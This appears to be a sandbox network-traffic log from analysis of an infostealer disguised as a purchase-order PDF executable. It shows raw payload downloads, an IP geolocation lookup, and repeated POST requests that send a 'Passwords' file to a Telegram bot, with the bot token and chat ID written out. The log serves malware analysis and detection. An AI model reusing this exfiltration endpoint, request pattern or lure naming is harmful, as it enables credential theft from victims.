2024-12-17 02:29:44 UTC	4944	IN	Data Raw: 59 6d a8 a4 50 d0 4e 1d 47 6f 21 a9 1d d6 2a 27 ec fc 17 0f 07 0b 30 71 2f c6 36 97 47 b4 bf f7 69 e8 32 e2 17 37 e9 6d 1d 66 e3 55 48 6c 51 8a 97 03 f8 fa e5 63 37 f6 c6 b3 0c 13 37 34 eb 2c 1c f2 4f 38 7c 8e 09 3b ad 27 15 ce 12 64 4a 9e 10 2c 2c b8 3a c3 ad f3 68 e9 15 10 44 f7 e1 2f 18 2d bc 5e 9b f7 99 d7 cc 0e a6 f9 c7 4a 12 68 10 86 4e f7 62 16 8d dd 28 fb af 5e 36 2d 4d 22 15 cd 6b 0e a6 43 a5 82 41 53 fb 6d 81 df c0 9d 5c 20 33 8e 84 06 47 f7 53 07 23 ca 24 98 d9 f3 c5 bb 6c 4c 2b 58 8c e2 48 b5 6d f2 19 1b b7 bd b7 81 72 f3 93 42 a1 53 b1 52 28 8b 0b bf ae 9a e0 18 ad 6a 2d 76 e5 01 37 8b bf 71 38 80 59 3f 11 24 1c f0 b0 b7 fa c9 ab 2d eb b1 38 2f 5f 11 b4 ce ae 7e c6 1e 3a bb bc 83 a9 16 bc e6 4a 97 a2 3e da 4a 1e 8f f5 89 44 9d a4 5e 43 8f b8 Data Ascii: YmPNGo!*'0q/6Gi27mfUHlQc774,O8\|;'dJ,,:hD/-^JhNb(^6-M"kCASm\ 3GS#$lL+XHmrBSR(j-v7q8Y?$-8/_~:J>JD^C
2024-12-17 02:29:44 UTC	4807	IN	Data Raw: 17 ec 64 ae 4b e5 25 a5 d2 16 c6 b3 32 81 a8 65 61 07 7d d2 63 f7 99 ba ea c2 49 6c a2 04 f7 c8 14 07 2a d7 9a c0 be bc 38 05 3f ee 2f 48 37 2a 62 d2 e8 77 23 69 32 20 a5 21 31 96 75 13 8a ae 81 c5 00 34 04 8f 8d 1b 53 7f 5e 77 10 07 17 1c f9 8d 0d 2d 65 73 0c 3f 65 51 df 59 b4 f6 94 b2 17 02 87 50 33 6c 00 f9 8d 4d cb 17 c9 69 ae 21 9f cc 00 e9 d9 11 b6 b1 fd 30 69 c2 67 9d d2 61 f7 ca b1 ef a2 89 fd 07 37 e0 a3 20 a9 e6 59 10 c8 b8 49 a4 65 f2 d6 5d 48 24 0c 12 5f 0b 9b 32 f9 69 ce a8 aa b2 a9 28 49 b6 60 e7 6a b8 c3 cd 24 62 f8 1c 90 bd 9e a5 b2 5f a5 9d 03 3d d5 a4 22 73 52 3c 36 95 af 57 54 52 ae a0 96 5e 48 86 91 08 65 d5 87 92 3e 7e 05 be 10 9a 8c f9 2b 93 1c b2 93 04 62 fd 55 b8 19 84 5b 33 e2 cb a6 b2 63 d2 78 4b c4 b2 1d a3 96 ea a6 cb e0 41 f6 Data Ascii: dK%2ea}cIl8?/H7bw#i2 !1u4S^w-es?eQYP3lMi!0iga7 YIe]H$_2i(I`j$b_="sR<6WTR^He>~+bU[3cxKA
2024-12-17 02:29:44 UTC	1326	IN	Data Raw: 1a 36 ff eb ad 3e 64 39 91 20 9d e2 6c 8e 36 6d 77 3a ba 00 17 c6 75 63 1f 3b 6b 4d db 76 0d 42 4d 72 63 ca 59 d3 e3 24 c3 b5 bf 5a b6 67 76 54 38 59 fa 9a 92 c7 e2 84 c7 81 2e 25 02 e3 6b 8f 56 c1 b7 f5 ff 25 a2 8b c7 fd ff f2 21 08 84 4c fe ec 4d 42 cf 10 3d 37 4f a5 28 8d 85 f8 fe b4 3a 18 f3 86 b5 8c 4e 09 ea 3a e2 fb 6b 67 5a 73 82 09 37 c8 ef 3e 3e d9 06 f5 a2 ef 62 af c8 7d 77 fb 84 d2 db e5 61 c6 1a cc 1d dd c6 a0 45 84 23 bb 2f c6 71 8f c1 e3 6e bc 8d 56 9e 46 3e 64 df 9e 90 c9 0b e8 cd ba e3 16 d2 8e eb b1 81 7f d8 8e 73 46 9c f6 57 79 71 44 a0 d7 27 6a 17 f4 92 d0 b5 ff 46 b1 62 c6 c1 82 a8 b6 7b 70 95 4d 2a 82 7c 34 06 71 d3 95 fc 00 16 4a fc 5b 57 30 b2 64 ec 7e 55 45 b3 14 41 7a 37 ee c4 93 91 ae c4 76 7d 9a 1d d2 16 93 fb e2 57 ec 4a e0 5f Data Ascii: 6>d9 l6mw:uc;kMvBMrcY$ZgvT8Y.%kV%!LMB=7O(:N:kgZs7>>b}waE#/qnVF>dsFWyqD'jFb{pM*\|4qJ[W0d~UEAz7v}WJ_
2024-12-17 02:29:44 UTC	1390	IN	Data Raw: 32 79 bc c1 65 af aa 44 4a 2f d4 b4 e9 ab 49 c2 cb 65 11 af 58 b5 78 98 5d be c2 4f eb 49 b2 76 6f d1 14 7e a4 f5 88 a6 d0 7a 38 0f 39 90 d4 47 60 62 44 d2 98 df 18 cd 32 08 fd 32 35 e2 a7 04 88 aa 90 c1 28 7a 7a 97 87 9b 58 0d 08 78 10 65 03 1c a5 8d 0d 2d 60 88 1c 29 4d d1 04 6f bd f5 6a a4 1b 71 0b 4b 5c 67 13 ff 96 4b 69 09 e2 6b aa 52 38 cd 10 e3 b6 9d b6 ac f7 4a ef c4 07 12 d2 61 fd af a0 e5 a2 c7 91 97 37 cc a9 20 a9 e0 02 58 c8 b8 49 dd 0f 74 e9 2d 60 13 29 04 2b ae b3 32 89 c1 c3 f8 d8 54 b6 47 ab 14 45 f5 18 ab d3 bf 50 c7 dd 75 9c be 88 a5 c6 8f 3b 82 10 49 e7 6e b3 73 58 52 80 83 d1 83 54 2c b6 d2 ac 4c 3b 62 fe d7 6f c6 8a 21 1d 06 ee 60 10 90 97 8c a9 13 1c c2 f6 db 1c dd 5f 1a 38 ef b2 ed e2 c1 bf c8 f9 de 78 3b af 1f 81 a8 9c 38 95 fa 1f Data Ascii: 2yeDJ/IeXx]OIvo~z89G`bD225(zzXxe-`)MojqK\gKikR8Ja7 XIt-`)+2TGEPu;InsXRT,L;bo!`_8x;8
2024-12-17 02:29:44 UTC	1390	IN	Data Raw: 5f 0b 01 80 bb d9 cc 2e 93 54 07 f8 26 1c f0 41 bb e9 c5 3a 3f b5 a0 36 3a b0 11 b4 cc bd 71 d7 10 2b b5 10 56 b2 16 cc a9 a1 97 a2 94 cc 9c 71 60 b5 89 4e ae b4 4f 4d ff ec 9c e3 64 97 2f 9d da 83 45 84 18 5e a9 7c 78 e6 5a f6 36 05 42 6e 6f 7c 33 9e db 0e 44 e9 3b f6 9b 58 63 55 db 74 08 ed a6 c9 0b 1e ca a8 0f cc 5a 7b 5b 1b f8 c8 a4 39 65 7a 95 ad f4 f4 3e 5a fe 25 04 4c c3 0c 76 52 a0 09 ad 93 68 27 16 64 1e a5 ad ba 5e 8c d3 01 30 ef 97 b6 0d c4 63 75 80 17 aa 8e 5f 82 52 ab 06 46 7e 3b 34 60 93 78 c8 09 23 57 db c7 8e 3e b5 8a 9f 3b 19 a7 cf d2 3d ca d3 2a cf 1d c3 38 ef d2 b4 5c c0 f1 59 24 33 e5 38 cc 38 cb 0c 7c 3e bd 7d 38 55 d6 29 46 ce a9 7d 24 06 0e 3a 84 0c 56 bc 8b 4c 5e 1d 7b 60 6c 4f 1b b9 76 2f 28 a7 d6 bf 5f 07 8a 8a 48 1d 05 be b4 0e Data Ascii: _.T&A:?6:q+Vq`NOMd/E^\|xZ6Bno\|3D;XcUtZ{[9ez>Z%LvRh'd^0cu_RF~;4`x#W>;=*8\Y$388\|>}8U)F}$:VL^{`lOv/(_H
2024-12-17 02:29:44 UTC	1390	IN	Data Raw: 58 3b b1 0d 46 88 62 69 30 3b 7d 59 aa 17 0d 44 63 70 18 9a 69 d5 e7 1e 10 b5 bf 61 b6 65 62 da 53 56 7f 81 92 b3 c8 c8 bc cc 24 2e 10 46 e3 8f 56 ca c6 be d7 dd a6 8b cd c1 01 f3 2c 12 a7 4b ef 73 61 4b db 27 39 37 66 78 2a f6 c3 f8 8c 52 5f 4b 83 98 cc 5d 1a 09 e0 37 c0 07 78 63 41 5f 55 04 35 b9 ba 38 2f db 41 da a2 ef 62 bc c0 56 36 91 c6 bd a5 e1 1f 9f 32 f6 17 f5 98 b3 4c 9f 21 c8 a1 c3 60 8b fe e4 7d cd a8 ab 9e 42 1c a4 d4 8f 91 da 07 f9 c3 ed b2 07 d8 e5 6b e2 81 75 c5 c9 d8 46 9c f6 34 71 63 42 bb f9 61 67 15 85 d6 d0 b5 fb 7f 6a 0d 46 cb 82 a2 a5 74 1a d4 60 9a 58 15 76 0e 04 c8 bd a8 01 3a 4d e0 5a 31 26 a3 63 c1 1c 56 3e ff 1e 41 a2 17 b3 ad 88 41 b9 1e 61 81 17 44 c9 26 98 e8 cf 5e f7 5b c2 49 c9 dd 28 ff 67 88 23 5d 7f f4 70 fe 7d 69 62 fb Data Ascii: X;Fbi0;}YDcpiaebSV$.FV,KsaK'97fx*R_K]7xcA_U58/AbV62L!`}BkuF4qcBagjFt`Xv:MZ1&cV>AAaD&^[I(g#]p}ib
2024-12-17 02:29:44 UTC	1390	IN	Data Raw: 01 24 78 8d 0d 63 73 8d 0c 37 50 44 da 1c ae f7 94 81 17 71 1a 50 2c 7a 3b 27 9c 4b bf 7b e9 74 aa 22 3a 82 00 e3 bc 95 b6 b7 df c8 78 c4 02 19 d5 58 bb b5 90 ef a4 fe 45 97 37 e6 a5 28 ca ba 6d 81 b8 d7 91 d6 15 ff f0 25 0f c1 0c 12 5f 73 7c 21 ff 75 f5 e8 92 a5 a2 47 db be 71 ea 18 c1 d9 bf 50 0a 2d 6c ee a6 93 ad a7 2a 45 e8 1f 4d 8d 8c f7 73 58 55 b6 91 a7 4c 53 5e 20 bc 96 2a 54 c7 91 08 69 d5 85 92 3d 39 03 be 10 96 8e f6 55 0d 30 f1 9f 2c 1f dc 55 b2 72 f3 cd 33 e8 ae b0 bb 1d c3 50 df c0 c0 87 bb 9f 8b b9 f7 9f 40 e5 34 d7 9d f2 90 42 01 2f 94 4c 23 68 82 45 d9 61 4a 92 fd d3 1d 25 f0 00 71 bc 36 ee f4 f5 e4 d5 b6 0c 67 04 b1 bf 79 44 2b 59 87 0a 50 7f 7c bb 28 9f 39 8a d6 17 6e 23 17 73 22 45 55 7e c5 62 11 d0 8e c4 b7 5f 49 c8 8b a8 a1 2b 93 b6 Data Ascii: $xcs7PDqP,z;'K{t":xXE7(m%_s\|!uGqP-lEMsXULS^ Ti=9U0,Ur3P@4B/L#hEaJ%q6gyD+YP\|(9n#s"EU~b_I+
2024-12-17 02:29:44 UTC	1390	IN	Data Raw: 00 8d 35 8d d4 a8 52 d2 b9 e5 8c 84 67 8b 47 25 24 ae a1 f2 1c 09 d9 b7 12 2a 5e 7b 21 67 eb d8 b6 22 59 f8 84 be 9d 15 37 4b fd 17 eb 59 c6 97 47 88 b6 f7 ac 7e 62 25 0a 59 1f 9e 1e ab 47 aa c4 12 4c a8 97 9d 02 d5 7d 4e 0d 17 bb 9b 5b 5d 41 b1 10 7e 45 03 2a c8 93 78 d3 15 23 4b 38 44 b2 0f d2 f4 5e 2a 02 30 bf f2 12 c4 c8 16 62 06 52 21 c1 29 b5 5b 3a 82 90 20 25 86 32 f5 a5 d8 11 67 35 7a 87 28 50 a4 da 55 dd c7 7a 18 96 15 ab a6 de a8 bf de 4c 4d 1d 69 5e 3e 7a 53 86 76 25 01 cc c0 cd b3 00 9c 88 08 3d 12 c7 05 0b eb f5 0d 94 71 eb 84 cd cb 58 cd 9f 5d 2c 8c 77 8f c1 28 e6 49 8b 47 e3 78 f8 f0 ad 9f 7a 3f 41 09 da 81 3f 72 7e ba 0d 0b 56 88 49 ec f1 61 67 04 a2 19 06 35 59 64 c3 04 63 e9 2c 41 58 28 1c b9 3c e9 5e 23 9a a7 4a 8d 3e b3 4a fd 87 f4 8c Data Ascii: 5RgG%$^{!g"Y7KYG~b%YGL}N[]A~Ex#K8D^*0bR!)[: %2g5z(PUzLMi^>zSv%=qX],w(IGxz?A?r~VIag5Ydc,AX(<^#J>J
2024-12-17 02:29:44 UTC	1390	IN	Data Raw: c5 4b f3 8c a9 5a 19 18 ef 42 0a f8 78 13 5d 5f 2f 04 35 b9 bf c0 3d 82 3d 2a b3 e3 44 e2 d5 f0 4a 80 ce d3 fe f7 6d 73 0e cc 67 57 b7 b7 4c 2c 0d a4 4e ef 75 8a 9d 4c 49 de d6 52 3c 67 0c c5 99 8b 9a b9 a9 cd d4 d0 ae b4 f7 96 e7 29 a3 7f a2 04 0f e6 9c fc 51 62 6f 3c be d1 0b 63 04 82 f2 9e b5 fb 64 e2 6d c6 cb 86 a8 b6 68 0c ce 9b 39 81 13 60 17 77 e7 5d 56 ff e9 40 f1 8c 54 12 8b 50 c0 73 5d 2d f1 14 69 2c 1f 3d ce 4d 9b ae ee 37 4b 9a 1d c9 26 99 fb db 56 ec 4a 92 5e c1 53 2b e5 bd a0 55 5d 7f fe 34 fe 6c 6f 6d dd e6 74 bd 43 a3 30 38 6e 79 ac b3 66 9c d3 3f 21 e7 4a a1 91 15 c8 a1 b5 f0 e5 de c5 d7 70 25 50 e6 58 5c bc 03 8c e9 13 8e d0 4a 6b 8d 6d 7f 38 f6 32 ee 17 34 5b cf c6 dc 0b 25 72 b4 58 6b 4c df e9 6f a9 c4 58 94 96 f8 64 64 8a 9c 03 46 35 Data Ascii: KZBx]_/5==*DJmsgWL,NuLIR<g)Qbo<cdmh9`w]V@TPs]-i,=M7K&VJ^S+U]4lomtC08nyf?!Jp%PX\Jkm824[%rXkLoXddF5
2024-12-17 02:29:44 UTC	1390	IN	Data Raw: a6 32 f3 70 e8 ef 82 e0 a3 47 d1 68 60 ed 40 e8 d9 bf 20 65 f8 6c ee b3 9e a5 b6 7a 36 96 03 27 fc e3 22 63 58 53 a5 d1 af 5d 55 37 8c a4 96 26 3a 12 91 3b 6f c6 91 83 27 0d b8 66 10 90 97 8c dd 20 1c c2 b1 4a 1c dd 5f b2 1d f1 e4 cb e2 c1 bf b1 1a f0 3e 4a c0 c0 87 db 41 9a b0 e5 6d 49 84 64 da 97 94 01 91 12 24 83 61 07 11 79 ef d9 67 57 59 eb ba 54 36 f7 32 77 b4 1e 7b fc e4 e5 b4 db 10 67 74 f5 4a 79 6c 87 54 8f 11 5f 1c 05 d5 b4 f3 56 2f b9 c2 68 30 15 14 6c 42 27 e8 f1 de 61 bf 5d d7 b2 59 4b c9 e8 4f 8c b8 e3 a0 a5 67 00 25 39 82 ff c4 af 55 3b 94 cf 94 a0 ca 9b 4c ce dc 12 17 71 27 4e 4c 79 c8 f8 8d 2f 41 50 06 08 9a 22 32 64 83 d2 1c 77 92 61 99 48 9e b7 64 8d 35 de 97 75 ab 38 ea db c3 1e 05 b5 76 f2 69 a9 16 25 2a 50 60 f6 34 8d 27 b8 70 64 4d Data Ascii: 2pGh`@ elz6'"cXS]U7&:;o'f J_>JAmId$aygWYT62w{gtJylT_V/h0lB'a]YKOg%9U;Lq'NLy/AP"2dwaHd5u8vi%*P`4'pdM

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	188.114.97.3	443	7716	C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 02:29:49 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-17 02:29:49 UTC	876	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 02:29:49 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 391358 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5E3BPvkalJN0hbbu%2BUm2TPCaEfukHDJVpZWby1BoEn9teZAoBaJo0v74NSQZ5hPo9TGt29MnFnUozPb1hawxjVDrNJJZdSyJ9Jlp%2BYn2p8kpeW9O6DknPQgCUhpBse358BP%2Fjy3B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f337cd94f9f728c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1977&min_rtt=1956&rtt_var=775&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1374117&cwnd=157&unsent_bytes=0&cid=e99cfe2a66fd69c0&ts=464&x=0"
2024-12-17 02:29:49 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49742	149.154.167.220	443	7716	C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 02:29:57 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd1e18c888856f Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2024-12-17 02:29:57 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 65 31 38 63 38 38 38 38 35 36 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd1e18c888856fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2024-12-17 02:29:57 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 17 Dec 2024 02:29:57 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-17 02:29:57 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 35 31 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 30 32 35 39 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":13510,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734402597,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49749	149.154.167.220	443	7716	C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 02:30:00 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd1e43f72e9d46 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2024-12-17 02:30:00 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 65 34 33 66 37 32 65 39 64 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd1e43f72e9d46Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2024-12-17 02:30:01 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 17 Dec 2024 02:30:01 GMT Content-Type: application/json Content-Length: 543 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-17 02:30:01 UTC	543	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 35 31 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 30 32 36 30 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":13511,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734402600,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49785	149.154.167.220	443	7716	C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 02:30:13 UTC	271	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd1edc6a8bed6e Host: api.telegram.org Content-Length: 1090
2024-12-17 02:30:13 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 65 64 63 36 61 38 62 65 64 36 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd1edc6a8bed6eContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2024-12-17 02:30:14 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 17 Dec 2024 02:30:14 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-17 02:30:14 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 35 31 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 30 32 36 31 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: 